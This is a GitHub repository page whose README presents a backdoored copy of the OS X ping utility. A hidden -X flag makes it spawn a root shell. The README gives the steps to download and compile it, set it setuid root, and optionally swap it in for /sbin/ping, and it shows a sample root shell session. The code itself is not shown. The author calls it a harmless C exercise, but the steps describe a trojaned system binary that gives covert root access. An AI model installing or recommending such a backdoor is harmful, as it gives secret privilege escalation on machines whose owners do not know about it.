Skip to content

Latest commit

 

History

History

osx-ping-backdoor

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
ping.c
ping.c
 
 

README.md

OS X Backdoored ping

This is just the normal OS X ping, but if you run it with the flag -X, it drops a root shell. This relies on the suid bit being set, it's not an exploit and it won't help you root a server (which you shouldn't be doing anyway 😠).

I didn't write the ping utility, this is just the normal OS X ping, the source code of which can be found here. All I did was add the -X flag and the function r00t().

This program still works like the normal ping. It just has a little secret 😉

Compilation & Installation

  1. wget https://raw.githubusercontent.com/raincoats/osx-ping-backdoor/master/ping.c
  2. gcc ping.c -o ping
  3. chown root:wheel ./ping; chmod 4755 ./ping
  4. Optionally, mv /sbin/ping{,-backup} && mv ./ping /sbin (but I mean, really, are you sure you want a backdoor on your smackbook throw?)

Usage

$ ./ping -X
   .----------------.
   |_I_I_I_I_I_I_I_I]___
   |  _    r00t! : ; _  )
  ='-(_)----------=-(_)-'
sh-3.2# whoami
root
sh-3.2#

Why did you even bother

This is me attempting to learn a little C. Even though I didn't do much, I'm stoked that it compiles & works. So if you don't like it buzz off 🐝🐝🐝🐝